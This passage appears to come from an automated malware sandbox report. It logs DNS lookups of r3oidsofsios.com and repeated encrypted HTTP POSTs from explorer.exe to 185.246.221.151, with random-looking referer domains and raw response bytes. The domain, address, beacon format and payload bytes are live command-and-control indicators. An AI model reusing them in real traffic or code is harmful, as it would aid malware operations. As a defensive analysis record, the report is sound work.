                          Nov 30, 2022 00:12:39.224884987 CET192.168.2.78.8.8.80x2155Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:39.508954048 CET192.168.2.78.8.8.80xa014Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:40.331233978 CET192.168.2.78.8.8.80xec7aStandard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Nov 30, 2022 00:12:31.867197037 CET8.8.8.8192.168.2.70xe620No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:32.811173916 CET8.8.8.8192.168.2.70x9a00No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:33.028825998 CET8.8.8.8192.168.2.70xcb73No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:33.212548971 CET8.8.8.8192.168.2.70xd2b9No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:33.821990967 CET8.8.8.8192.168.2.70xd702No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:34.036792994 CET8.8.8.8192.168.2.70xde7cNo error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:34.488857985 CET8.8.8.8192.168.2.70x80e4No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:34.669634104 CET8.8.8.8192.168.2.70x2609No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:34.851197958 CET8.8.8.8192.168.2.70xbf35No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:35.319250107 CET8.8.8.8192.168.2.70x883fNo error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:35.494378090 CET8.8.8.8192.168.2.70xef7No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:35.672054052 CET8.8.8.8192.168.2.70x7e44No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:35.871113062 CET8.8.8.8192.168.2.70xb4f1No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:36.067956924 CET8.8.8.8192.168.2.70x6dd1No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:36.359834909 CET8.8.8.8192.168.2.70x8b45No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:36.543272018 CET8.8.8.8192.168.2.70x7568No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:36.996306896 CET8.8.8.8192.168.2.70x4443No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:37.183329105 CET8.8.8.8192.168.2.70xc6d7No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:37.373538971 CET8.8.8.8192.168.2.70x2915No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:37.549065113 CET8.8.8.8192.168.2.70x8766No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:37.750535965 CET8.8.8.8192.168.2.70xdb37No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:37.969152927 CET8.8.8.8192.168.2.70x67f0No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:38.158756018 CET8.8.8.8192.168.2.70xebc7No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:38.360474110 CET8.8.8.8192.168.2.70xb147No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:38.774048090 CET8.8.8.8192.168.2.70x39bdNo error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:39.002141953 CET8.8.8.8192.168.2.70xcceaNo error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:39.242450953 CET8.8.8.8192.168.2.70x2155No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:39.526495934 CET8.8.8.8192.168.2.70xa014No error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false
                          Nov 30, 2022 00:12:40.349824905 CET8.8.8.8192.168.2.70xec7aNo error (0)r3oidsofsios.com185.246.221.151A (IP address)IN (0x0001)false

                          HTTP Request Dependency Graph

                          • kqgkblakc.com
                            • r3oidsofsios.com
                          • ryjwkat.net
                          • ewfonmrybp.org
                          • hraesy.net
                          • vqnwxa.org
                          • sqyiaue.net
                          • cygghp.com
                          • dtxwodx.net
                          • wypuksbjb.org
                          • qgjuekrsef.net
                          • rlovsbdvn.net
                          • ugjjaam.net
                          • poflgkd.org
                          • vshacsl.org
                          • kabjenh.com
                          • vyukg.com
                          • xnfwjbsuvp.com
                          • nvftibg.com
                          • okade.org
                          • iungf.org
                          • bhqtkqlvvb.org
                          • whvkq.com
                          • rspyhp.net
                          • jvjyarecuw.net
                          • hrxqxa.net
                          • uwoxt.net
                          • bqruytosp.com
                          • lclth.com
                          • vreqndf.com

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          0192.168.2.749715185.246.221.15180C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          Nov 30, 2022 00:12:31.899173021 CET124OUTPOST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://kqgkblakc.com/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 323
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:31.899214029 CET124OUTData Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d3 66 97 02 1f d3 27 f2 fe 75 d5 74 03 5e
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f'ut^q)[tkXOaG#'@:(OR+&>;##C6+-@J"7p# h1~rXA25K>u!5([SU%:_%hatFB|gtY)
                          Nov 30, 2022 00:12:32.019617081 CET126INHTTP/1.1 404 Not Found
                          Date: Tue, 29 Nov 2022 23:12:31 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Connection: close
                          Transfer-Encoding: chunked
                          Content-Type: text/html; charset=utf-8
                          Data Raw: 32 37 34 66 65 0d 0a 2f 00 00 00 8f 3b 41 39 46 2c cf 62 b4 69 4c 7a ea be ee 06 5f 4c ee 8e a8 e1 af 06 13 a0 cc 71 e9 ea 11 2f 96 e3 88 cb 32 b7 9a 95 e1 3c f7 13 c7 f8 58 00 ca 74 02 00 1c ac 2b da 00 0b 07 00 09 00 34 00 00 01 54 b5 a6 04 fa 19 13 50 fe ad bf fe 50 01 0b 00 6b 6d 9b a1 be 47 6b 95 bb 2f 20 d4 c8 8f 3e f9 48 d9 5d 6d 65 6d 75 16 dc 93 04 9a 4e 3d 6e 00 a7 fb c4 e6 ba 10 81 4e de c9 81 63 bd 6b c1 21 12 08 03 82 92 b9 66 33 2c c4 d8 a4 26 81 d2 23 e6 f5 f0 39 01 b1 f6 c3 ff ed 03 02 bb a2 cb aa 25 f7 50 36 a5 43 cb 97 a8 89 2f 73 18 41 7c 38 c8 25 6c e3 2a 3c 5c 31 22 93 fa eb 08 47 0a cb 81 c7 f6 64 05 28 c2 6a 21 d2 ce 9f ad 76 7d 4a 1a d8 92 2f 8c 78 c6 24 f2 d6 cf 6b fb c5 e7 05 b0 1f 95 8d a2 26 fc ad 77 7d 1f 5b 65 2f 3f 20 47 56 ae f1 94 d8 e8 af 02 9c 35 87 be c3 a6 6b 91 75 5d 48 ac 3a 7e a2 d9 1c ad 62 4f e2 8d fa e3 a9 4d d6 02 65 2c a5 97 c6 61 03 59 fc 1d d4 88 16 72 64 45 ef 71 50 7d 98 6f 6e 3b 4c 4a 24 46 46 d2 e5 01 0f 29 c5 77 b5 91 d2 cf 70 47 4e 70 90 b9 1a e8 a3 c8 f4 35 b3 7d 94 47 eb 9e 1c 83 1b 9f 2b 04 01 20 1b 5d 82 c5 96 4e c0 54 3b 64 88 1b 82 ad a0 f7 12 e2 23 b3 67 bd 67 b8 6c d5 2e df 89 bb 99 b8 f8 a8 37 72 14 26 37 4c 36 33 93 ea 14 9f fc 79 88 6c 52 f9 4b a8 4b 79 72 fe 17 4a 97 56 fc 2c 49 19 fe ac 9b 63 57 59 57 b2 6d 42 86 48 71 26 85 c8 e9 46 b3 be 7d 6e 49 77 a0 bc d7 28 3b 4d 72 ba 0f 96 20 d8 e2 f0 06 2a 13 f4 31 f3 75 9d 49 ed a3 a9 16 2a be 8b 64 65 69 55 b5 88 be 3d 47 b3 fd d6 b1 69 98 52 de 77 cb ee 26 12 15 57 48 43 74 87 cc a7 87 b5 da 57 bd 62 db 5b 02 16 5b 43 da 83 e9 7d eb 69 ba cb 94 e0 d3 9c 36 d6 e8 5e 61 b8 d3 7c 0b 4f 5f d4 5f 20 84 6f 29 33 35 f8 06 1c 4b 74 4f 8b c3 37 09 e9 f0 3f 99 f4 29 aa d7 6c e4 9b 7d 8d 35 38 05 d8 ed 28 87 b4 7c 23 20 1a 4c 17 4f d3 f2 78 47 99 4d 46 4c ff 34 b5 cf ce 58 f4 58 6b ff 58 95 63 70 fe 45 7b 44 6a 9d 01 70 a4 96 d5 37 e9 53 35 1c ec 0d 77 3d 02 33 8a 5d 4f 02 f9 f2 29 23 5a ba c1 49 cd e4 b9 8f de 25 c8 51 82 ca ba 10 3a 0d e9 c9 3c 79 23 63 02 10 48 3f 91 d7 9d ee 95 29 de 70 a0 eb 9f 55 33 e8 17 3e 67 82 d3 5f 4a b1 d1 1c b2 35 6f e1 d4 36 68 1c b3 19 84 3c 49 ae 3a bf 98 c3 68 29 98 be f9 8d 66 0e 59 d3 88 1d a4 ea 06 bc 7f ab de 5a 8a 42 d8 ab 4a ed 7b 02 99 5f 31 df c6 ae 1b 3c a7 00 1c 42 02 01 1b 9b b8 5a 93 aa ba 49 d3 17 c5 0a f3 97 e0 63 f3 d1 e5 b9 41 bb 2a 06 24 ad af b9 25 17 3b f1 9b 84 1e ce 34 9c 3a 66 91 81 a2 ef 69 19 74 61 e8 33 37 39 af ed b1 65 c2 c3 f9 b0 fa f4 1c 64 c9 43 62 b0 fb e1 82 2e 1e ff a9 5b 8f 2c 06 1c 99 47 12 ba b9 cb de a6 fb 99 d6 48 4c ef 17 cd 38 c0 b1 f7 5c 4d 17 a5 55 86 f6 0f 6e 91 4f 16 df 22 08 2a 6e 37 d0 e4 00 c5 68 60 4a 30 1a 94 6b 3c 70 15 50 86 ac e2 b2 6c 59 c9 04 da 97 f7 61 7d 85 31 2d cb 9f 14 c0 72 fd 91 84 ff e6 9b 97 bb 1d 2c 7e fc 66 96 1e 85 41 67 5c 41 d7 d5 63 7c 55 a6 73 68 f1 7b 06 63 c1 43 53 6d 2b a9 b8 33 17 10 93 0d fe 52 14 cc f6 03 5c e0 17 a5 ac 37 e9 a8 44 fd 01 bc 68 42 c4 5e d8 07 96 b1 8d 7e c5 23 ef d2 c8 90 b5 3f 98 00 4e fc b3 2b e5 63 ae 4b 20 88 a4 58 65 ea ee a5 8e ae 58 00 2f a2 f5 7d a4 00 27 83 21 dd 64 5f c1 fd 28 0d e4 0a ba 64 a5 46 2b 8e 08 5d 0b c1 01 73 70 2a 14 62 03 02 76 c4 e9 ba 55 07 90 08 37 a5 ef 08 a8 1c 1e e3 16 8a de d8 01 1a 83 4a 26 dd 0d 32 28 90 ae 25 2c ee 52 ae 71 73 0d 95 e7 11 2d 4e a5 dd fd 5f b1 09 99 ed be 2a e9 0b 03 a0 cc 0c eb
                          Data Ascii: 274fe/;A9F,biLz_Lq/2<Xt+4TPPkmGk/ >H]memuN=nNck!f3,&#9%P6C/sA|8%l*<\1"Gd(j!v}J/x$k&w}[e/? GV5ku]H:~bOMe,aYrdEqP}on;LJ$FF)wpGNp5}G+ ]NT;d#ggl.7r&7L63ylRKKyrJV,IcWYWmBHq&F}nIw(;Mr *1uI*deiU=GiRw&WHCtWb[[C}i6^a|O__ o)35KtO7?)l}58(|# LOxGMFL4XXkXcpE{Djp7S5w=3]O)#ZI%Q:<y#cH?)pU3>g_J5o6h<I:h)fYZBJ{_1<BZIcA*$%;4:fita379edCb.[,GHL8\MUnO"*n7h`J0k<pPlYa}1-r,~fAg\Ac|Ush{cCSm+3R\7DhB^~#?N+cK XeX/}'!d_(dF+]sp*bvU7J&2(%,Rqs-N_*
                          Nov 30, 2022 00:12:32.019654036 CET127INData Raw: 1b d8 27 46 6b a5 cf d9 84 0f a2 38 07 df bf 95 9a 91 dd bf 7d 90 86 61 bb bb 44 4a ab 65 90 82 9f 02 6a 66 ed d5 48 0b 74 31 30 ce 07 c0 36 77 e4 24 d9 1a 4d 03 38 87 53 f5 76 84 36 3f a0 c8 9e 93 81 1a 8c d7 7d f2 39 74 03 73 09 8a e8 00 c4 6b
                          Data Ascii: 'Fk8}aDJejfHt106w$M8Sv6?}9tsko?0:~<6SV)$)UL3u,e>K[L<NVqgV(DS:jV9JHUhEHsRRqqn^E7:{a`E2~'%AyV"0
                          Nov 30, 2022 00:12:32.019699097 CET128INData Raw: c0 f1 fd 09 4b 66 52 c6 42 54 db a7 2a 02 3f 74 6a 8c f7 82 b0 f3 33 43 24 c5 1e b8 f6 f9 8d fd db e6 aa 0d 5d d5 b6 b0 99 a4 2d 86 4d 3a c8 d7 80 ec b3 ef 43 68 d7 d6 2a e6 45 2b 8d 90 9d d9 51 95 31 ee 96 00 69 e9 40 a6 b9 99 1e c4 40 8e ae a0
                          Data Ascii: KfRBT*?tj3C$]-M:Ch*E+Q1i@@RKQUN^n7IS,^gIB#RT+T-t{xd|,(,HOYsXz[6&NtQX;QaA4%dV,vAMN:D$]'o
                          Nov 30, 2022 00:12:32.019731998 CET130INData Raw: 27 bb 5f d1 3d e9 86 c2 4f da 97 ac 2b 6d ff cb 1d 57 d1 2e 97 d4 6c a4 9f 78 ca 3a bb 08 23 66 9f a5 1c 73 9d df 48 56 03 82 4b 24 24 fc 9e de b7 c9 98 79 ee b2 65 a3 72 7d da ca e9 1c 7a f6 21 5d 01 ce 96 c1 89 51 66 fa 27 29 c0 1e 40 ce 58 da
                          Data Ascii: '_=O+mW.lx:#fsHVK$$yer}z!]Qf')@XC!\&3P[YIf[_#HvpFG?[}zTu|tty`jiM<T}Pmmc3+3]rnvSA*>6Z?IY}q*.
                          Nov 30, 2022 00:12:32.019763947 CET131INData Raw: d4 69 e3 d1 9f bb ee c9 c3 86 8e cc 10 cc 03 65 cf 30 af d3 12 04 80 d0 a8 1e 47 ba aa d8 67 30 a6 47 9f 1f 93 57 fc 57 6d e4 6b 80 53 d0 5e 4d a0 0c 0d 3c 8b 39 0b b4 13 82 ab 76 a9 f3 2d 94 12 42 b6 ac 9f 11 e9 4a 6d 24 f6 f6 3c e2 a9 9c 26 d7
                          Data Ascii: ie0Gg0GWWmkS^M<9v-BJm$<&oK1SkR8N!o4swoN:*A`!"0T$r\)&SvX2B Ge5|NBG-@HP8Y 7bn]LH<xY.3l{{r6\n
                          Nov 30, 2022 00:12:32.019814014 CET132INData Raw: da 8b 1e f1 a5 27 e9 04 a1 cb f5 4c 83 e1 0b ea e6 d8 97 ef d3 cb e9 eb 7c 70 a9 c4 c2 ce 1a 7f d8 1a f9 e8 5a d5 18 bc d9 14 8d 33 2d 0b 7d cf 39 68 ad d3 06 3a ff fb 96 34 3b bf 53 cc be 43 49 76 c8 c7 76 c2 04 f8 7c 0c 86 24 3a 8b d0 0c c8 31
                          Data Ascii: 'L|pZ3-}9h:4;SCIvv|$:1["`ifwmBx%~&nWa=XU$OQ.IX9d$HOI_\wTvPx<Z7VD|rT0Pk{C*ORtm}7&P
                          Nov 30, 2022 00:12:32.019865036 CET134INData Raw: 19 49 73 0a 22 e7 63 05 1e 44 86 2f fd be 71 46 22 f9 96 dd 06 da 78 61 a8 69 94 04 3d 9f fc fd 79 cc 71 57 79 77 10 6d 54 77 a5 a1 d6 73 f0 8d 4c 22 6c 4d 3a 53 14 69 e8 12 7f cc 43 8b cc a6 d9 87 98 5e 84 87 3f 78 b3 b5 17 5e 6c ca 6b bc d9 d3
                          Data Ascii: Is"cD/qF"xai=yqWywmTwsL"lM:SiC^?x^lk2ZLG6\'-s,5nW!kraTI`[-q+O3lxbUf+x`qq="a3dF:ieepCqYDD.&~6sUW`1mhW>L_C
                          Nov 30, 2022 00:12:32.019922972 CET135INData Raw: 98 3a 28 e8 c4 46 97 49 06 2b dc cf 9e 10 76 f7 44 0a 90 03 2d b8 c2 04 a9 4a 4f fc 7e 0b 67 19 8e de 91 db 72 4a 95 ad b7 8e 1d af 81 f6 8d 56 68 29 bc 1b 12 e5 42 52 a0 56 58 05 bb 13 f9 97 19 24 9d 5a c2 48 72 fd e3 a1 8f 73 8b 4e 01 87 ed b6
                          Data Ascii: :(FI+vD-JO~grJVh)BRVX$ZHrsNF;X/}iNQ.F`BI@_N{HOp;eoFs%WqWPJuDSjK^A9aiG@<dI(S]j5~FmS
                          Nov 30, 2022 00:12:32.019973040 CET136INData Raw: fb 57 63 0a 15 fc 0c e2 b8 d9 f1 2a 48 e6 9e 4e d7 88 7b 33 45 22 e7 86 3d a0 5b 9a 69 b3 e0 1f c1 93 5e 71 3e 16 f0 ec 39 32 32 46 6c 4b 52 48 32 0e 06 bc e6 dd b3 dc 7e a9 c3 21 24 11 9b b7 1c df a4 13 3e fc 47 9d 08 c1 d4 9d e6 5a dd 14 6c 55
                          Data Ascii: Wc*HN{3E"=[i^q>922FlKRH2~!$>GZlU}G'QO]#o~l{aq`w)e Mh#l\>lo)w>KyQpcE[hnZHj-M2}F!l0Zh.QcX}
                          Nov 30, 2022 00:12:32.020023108 CET138INData Raw: 48 cf d2 75 c7 0d c0 4e 6b 8a f9 5e b9 17 72 ec 9b 66 77 e7 70 b5 74 d5 41 66 b9 a3 9c 05 da 0d f2 a9 27 f9 c3 e1 16 27 c7 85 28 1b a3 a1 a8 eb ca 29 3b f3 5a d5 e1 58 1b 55 a4 bb 76 71 d6 3b eb 5b 47 3a 47 90 20 b0 28 2f 79 be c2 bb eb a6 ba ed
                          Data Ascii: HuNk^rfwptAf''();ZXUvq;[G:G (/y'd3O)5%2(}c-XK]Y\dWt$V\EfLEa^xJvjQK'Qti!H`]xYE<(E4+?s
                          Nov 30, 2022 00:12:32.049228907 CET139INData Raw: a3 52 08 91 dc a8 22 bc 47 ea b5 31 9e b4 09 cf 91 5f 5e a1 37 fa 19 5d 19 e3 82 27 79 1a 8f 2c 1d eb df 9e 52 80 e6 49 fc ff fd c8 d7 93 91 89 29 67 e8 f6 52 81 1a f5 09 5c 44 6d 41 72 3a ad 66 68 d2 0a e8 d8 29 89 6d 08 eb 6a 31 d9 54 a6 01 03
                          Data Ascii: R"G1_^7]'y,RI)gR\DmAr:fh)mj1T}mVjg7S~n%HNbeK?\Q|t=@(v9`L%c".wl`w0[N,Z+xJ+oS_C1~s^UfZ;X)a\


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          1192.168.2.749716185.246.221.15180C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          Nov 30, 2022 00:12:32.851701021 CET293OUTPOST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://ryjwkat.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 311
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:32.851907015 CET293OUTData Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 97 02 1f d3 26 f2 fe 75 b6 59 2f 5b
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&uY/[8m:w6_HA^i{S2<wN&QY(`|b2x9;(e@kK-<!;p,uQ#[BxoRc%,A@G&"sY01@7*`a8a5+
                          Nov 30, 2022 00:12:32.977070093 CET294INHTTP/1.1 200 OK
                          Date: Tue, 29 Nov 2022 23:12:32 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Connection: close
                          Content-Type: text/html; charset=utf-8


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          10192.168.2.749725185.246.221.15180C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          Nov 30, 2022 00:12:35.522797108 CET306OUTPOST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://rlovsbdvn.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 350
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:35.522823095 CET306OUTData Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 9e 02 1f d3 26 f2 fe 75 f8 5f 5a 51
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&u_ZQ\_CA3CZSXSZP9u:os3^"cgLAk9{8 fV{(GD7wzuE=9_B'N:o<;~^4 {U P{Qjh8
                          Nov 30, 2022 00:12:35.638067961 CET307INHTTP/1.1 404 Not Found
                          Date: Tue, 29 Nov 2022 23:12:35 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 404
                          Connection: close
                          Content-Type: text/html; charset=utf-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          11192.168.2.749726185.246.221.15180C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          Nov 30, 2022 00:12:35.722484112 CET308OUTPOST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://ugjjaam.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 123
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:35.722635031 CET308OUTData Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 9d 02 1f d3 26 f2 fe 75 ae 1a 51 4a
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&uQJt/G7= xJ\J8f(].7Xp:
                          Nov 30, 2022 00:12:35.841212034 CET308INHTTP/1.1 200 OK
                          Date: Tue, 29 Nov 2022 23:12:35 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Connection: close
                          Content-Type: text/html; charset=utf-8


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          12192.168.2.749727185.246.221.15180C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          Nov 30, 2022 00:12:35.900690079 CET309OUTPOST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://poflgkd.org/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 317
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:35.900711060 CET310OUTData Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 9c 02 1f d3 26 f2 fe 75 f3 03 49 48
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&uIHAkBauHGe'?DNEFII"116R~` #*z2 [f(*oq8>15LT(^Z{(dxSx>~/;sKD.`I~SP~
                          Nov 30, 2022 00:12:36.028471947 CET310INHTTP/1.1 404 Not Found
                          Date: Tue, 29 Nov 2022 23:12:35 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 404
                          Connection: close
                          Content-Type: text/html; charset=utf-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 